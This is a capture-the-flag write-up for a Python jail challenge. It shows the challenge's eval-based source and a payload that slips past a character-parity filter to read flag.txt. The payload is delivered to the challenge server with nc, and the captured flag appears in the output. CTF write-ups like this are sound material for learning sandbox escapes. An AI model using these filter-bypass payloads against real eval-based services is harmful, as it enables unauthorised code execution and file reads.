๐ Parity 1
๐ Before you start
You can donate to me via Buy Me a Coffee or follow me on Github
๐ Challenge Statement
#!/usr/local/bin/python3
inp = input("> ")
for i, v in enumerate(inp):
if not (ord(v) < 128 and i % 2 == ord(v) % 2):
print('bad')
exit()
eval(inp)
๐ฉ Getting the Flag
We have a small script that checks each character of the user input for the following:
- If the ASCII code of the character is greater than 128.
- If the character index is odd, but the ASCII code of the character is even.
If these conditions are met, the program prints bad and exits.
Our goal is to ensure perfect conformity with these conditions in order to bypass the check and execute code.
An interesting point here is that our eval is using a global scope, which allows us to execute code.
We can do something quite simple:
- Use the fact that
\t(ASCII 9) is an odd number, and(ASCII 32) is an even number. - The
openkeyword satisfies the challenge's conditions.
open\t('f' + 'l' +"a"+"g"+ '.' + 't' + 'x' + 't' )
Now, we just need to find a way to read the file content, since we can't use the word read.
Luckily, thereโs a neat trick for that:
type([ ] )(open\t('f' + 'l' +"a"+"g"+ '.' + 't' + 'x' + 't' ) )
This will give us the file's content locally.
>>> eval("""type([ ] )(open\t('f' + 'l' +"a"+"g"+ '.' + 't' + 'x' + 't' ) )""")
['jail{flag_will_be_here_on_remote}\n']
Now, let's send this to the server.
$ cat inject.py
inp = """eval\t(\ttype([ ] )(open\t('f' + 'l' +"a"+"g"+ '.' + 't' + 'x' + 't' ) ) [0] )"""
print(inp)
$ python3 Parity-1/python.py | nc challs2.pyjail.club 7991
> Traceback (most recent call last):
File "/app/run", line 9, in <module>
eval(inp)
File "<string>", line 1, in <module>
File "<string>", line 1
jail{parity_41f5812e8c0cd9}
^
SyntaxError: invalid syntax
Now head over to version 2 of the challenge Parity 2.
๐ Support
๐ Before you leave
You can donate to me via Buy Me a Coffee or follow me on Github